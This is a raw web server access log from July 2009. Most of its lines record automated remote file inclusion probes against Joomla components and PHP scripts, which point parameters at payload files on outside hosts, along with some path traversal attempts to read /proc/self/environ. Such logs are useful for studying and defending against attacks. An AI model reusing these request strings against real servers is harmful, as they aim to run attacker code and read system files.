220.231.126.252 - - [06/Jul/2009:01:00:16 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:01:00:40 -0400] "GET /logs/access_log.Q109061700%20%20/errors.php?error=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.37.26.230 - - [06/Jul/2009:01:01:32 -0400] "GET /logs/access_log.Q109062900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 404 288 "-" "libwww-perl/5.803"
218.37.26.230 - - [06/Jul/2009:01:01:32 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
218.37.26.230 - - [06/Jul/2009:01:01:32 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
74.53.70.114 - - [06/Jul/2009:01:01:49 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:01:01:49 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:01:01:51 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:01:01:51 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.37.26.230 - - [06/Jul/2009:01:01:52 -0400] "GET /logs/access_log.Q109060300//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 404 288 "-" "libwww-perl/5.803"
209.59.12.99 - - [06/Jul/2009:01:02:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.53.70.114 - - [06/Jul/2009:01:02:01 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:01:02:01 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:01:02:01 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:01:02:04 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:01:02:12 -0400] "GET /logs/access_log.Q109061700%20%20/errors.php?error=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:01:02:17 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.234.21.178 - - [06/Jul/2009:01:02:26 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.234.21.178 - - [06/Jul/2009:01:02:26 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.234.21.178 - - [06/Jul/2009:01:02:26 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
218.37.26.230 - - [06/Jul/2009:01:03:10 -0400] "GET /logs/access_log.Q109051500%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 404 289 "-" "libwww-perl/5.803"
217.125.38.117 - - [06/Jul/2009:01:03:16 -0400] "GET /logs//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 200 8391 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:01:03:16 -0400] "GET /logs/access_log.Q109061300%20%20//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:01:03:16 -0400] "GET /logs/access_log.Q109052400%20%20//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:01:03:21 -0400] "GET //?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:01:03:38 -0400] "GET /logs/access_log.Q109060800%20%20//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:01:03:54 -0400] "GET /logs/access_log.Q109062000%20%20//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:01:04:39 -0400] "GET /logs/access_log.Q109063000%20%20//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:01:04:53 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:01:05:08 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jul/2009:01:05:38 -0400] "GET /logs/access_log.Q109061700///vwar/backup/errors.php?error=http://id1.fileave.com/id1.txt.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:01:05:41 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.146.231.194 - - [06/Jul/2009:01:05:47 -0400] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.yeojuspa.co.kr/board/readme.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
119.93.90.155 - - [06/Jul/2009:01:05:49 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://id1.fileave.com/id1.txt.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:01:05:49 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.234.21.178 - - [06/Jul/2009:01:05:58 -0400] "GET /logs/access_log.Q109051900/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:01:06:24 -0400] "GET /logs/access_log.Q109052500%20%20//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:01:07:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.125.38.117 - - [06/Jul/2009:01:07:21 -0400] "GET /logs/access_log.Q109061400%20%20//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:01:07:29 -0400] "GET /logs/access_log.Q109052900%20%20//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:01:07:32 -0400] "GET //include/admin.lib.inc.php?site_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:01:07:32 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:01:07:32 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:01:07:36 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:01:07:41 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:01:07:41 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:01:07:45 -0400] "GET /logs/access_log.Q109051600%20%20//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
207.210.89.18 - - [06/Jul/2009:01:08:24 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 257 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
207.210.89.18 - - [06/Jul/2009:01:08:24 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 262 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
220.231.126.252 - - [06/Jul/2009:01:08:30 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:01:08:30 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
207.210.89.18 - - [06/Jul/2009:01:08:30 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
207.210.89.18 - - [06/Jul/2009:01:08:30 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
220.231.126.252 - - [06/Jul/2009:01:08:33 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
207.210.89.18 - - [06/Jul/2009:01:08:35 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 257 "-" "XXXXXX"
207.210.89.18 - - [06/Jul/2009:01:08:35 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 262 "-" "XXXXXX"
207.210.89.18 - - [06/Jul/2009:01:08:40 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 257 "-" "XXXXXX"
207.210.89.18 - - [06/Jul/2009:01:08:40 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 262 "-" "XXXXXX"
220.231.126.252 - - [06/Jul/2009:01:09:14 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:01:09:16 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:09:21 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:09:21 -0400] "GET /logs/access_log.Q109051400////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:09:21 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 8393 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:09:21 -0400] "GET /logs/access_log.Q109051400////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:09:21 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:09:21 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 8393 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:09:22 -0400] "GET /logs/access_log.Q109051300////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:09:22 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:09:22 -0400] "GET /logs/access_log.Q109051300////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:09:22 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 8393 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:09:22 -0400] "GET /logs/access_log.Q109051400////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:09:24 -0400] "GET /logs/access_log.Q109051300////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:01:09:57 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:01:10:06 -0400] "GET /logs/access_log.Q109061300//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:01:10:18 -0400] "GET /logs/access_log.Q109051200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:01:10:19 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:01:10:19 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:01:10:26 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:01:10:26 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:01:10:26 -0400] "GET /logs/access_log.Q109063000//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:01:10:36 -0400] "GET /logs/access_log.Q109061200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:01:11:15 -0400] "GET /logs/access_log.Q109061800//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:11:31 -0400] "GET /logs/access_log.Q109051400%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:11:31 -0400] "GET /logs/access_log.Q109051400%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:11:31 -0400] "GET /logs/access_log.Q109051300%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:11:32 -0400] "GET /logs/access_log.Q109051300%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:11:36 -0400] "GET /logs/access_log.Q109051400%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:11:37 -0400] "GET /logs/access_log.Q109051300%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:11:46 -0400] "GET //?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:11:46 -0400] "GET /logs//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 200 8391 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:11:46 -0400] "GET /logs/access_log.Q109061300//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:01:12:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.65.36 - - [06/Jul/2009:01:11:57 -0400] "GET /logs/access_log.Q109053100 HTTP/1.0" 200 1986553 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.249.36.194 - - [06/Jul/2009:01:12:39 -0400] "GET /logs/access_log.Q109061300%20%20//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:01:12:55 -0400] "GET /logs/access_log.Q109063000%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:13:06 -0400] "GET /logs/access_log.Q109060800%20%20//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:01:13:09 -0400] "GET /logs/access_log.Q109061800%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:13:14 -0400] "GET /logs/access_log.Q109062000%20%20//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:13:31 -0400] "GET //?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:13:31 -0400] "GET /logs//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 200 8391 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:13:31 -0400] "GET /logs/access_log.Q109061300%20%20//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:14:00 -0400] "GET /logs/access_log.Q109060800%20%20//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:14:07 -0400] "GET /logs/access_log.Q109062000%20%20//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.249.68.70 - - [06/Jul/2009:01:15:52 -0400] "GET /images/items/2001201_thumb.jpg HTTP/1.1" 200 1727 "-" "Googlebot-Image/1.0"
209.59.12.99 - - [06/Jul/2009:01:17:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.65.36 - - [06/Jul/2009:01:17:07 -0400] "GET /logs/error_log.Q107073000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.65.36 - - [06/Jul/2009:01:17:08 -0400] "GET /logs/error_log.Q108010500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.125.38.117 - - [06/Jul/2009:01:18:08 -0400] "GET /logs/include/lib.inc.php?site_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:01:18:08 -0400] "GET /include/lib.inc.php?site_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:01:18:08 -0400] "GET /logs/access_log.Q109052800/include/lib.inc.php?site_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:20:14 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:20:14 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 8393 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:20:14 -0400] "GET /logs/access_log.Q109051600////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:20:19 -0400] "GET /logs/access_log.Q109060900////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:20:23 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:20:23 -0400] "GET /logs/access_log.Q109051600////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:20:25 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 8393 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:20:30 -0400] "GET /logs/access_log.Q109060900////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
131.203.76.246 - - [06/Jul/2009:01:20:55 -0400] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://hotshot24.co.kr/contents/kcp/payplus/log/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
131.203.76.246 - - [06/Jul/2009:01:20:55 -0400] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://hotshot24.co.kr/contents/kcp/payplus/log/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
131.203.76.246 - - [06/Jul/2009:01:20:55 -0400] "GET /logs/access_log.Q109061200%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://hotshot24.co.kr/contents/kcp/payplus/log/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:01:21:36 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:01:21:40 -0400] "GET ///vwar/backup/errors.php?error=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:01:21:40 -0400] "GET /logs///vwar/backup/errors.php?error=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:01:21:40 -0400] "GET /logs/access_log.Q109061700%20%20///vwar/backup/errors.php?error=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:01:21:40 -0400] "GET /logs/access_log.Q109051000%20%20///vwar/backup/errors.php?error=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:21:48 -0400] "GET /logs/access_log.Q109051600%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:21:50 -0400] "GET /logs/access_log.Q109060900%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
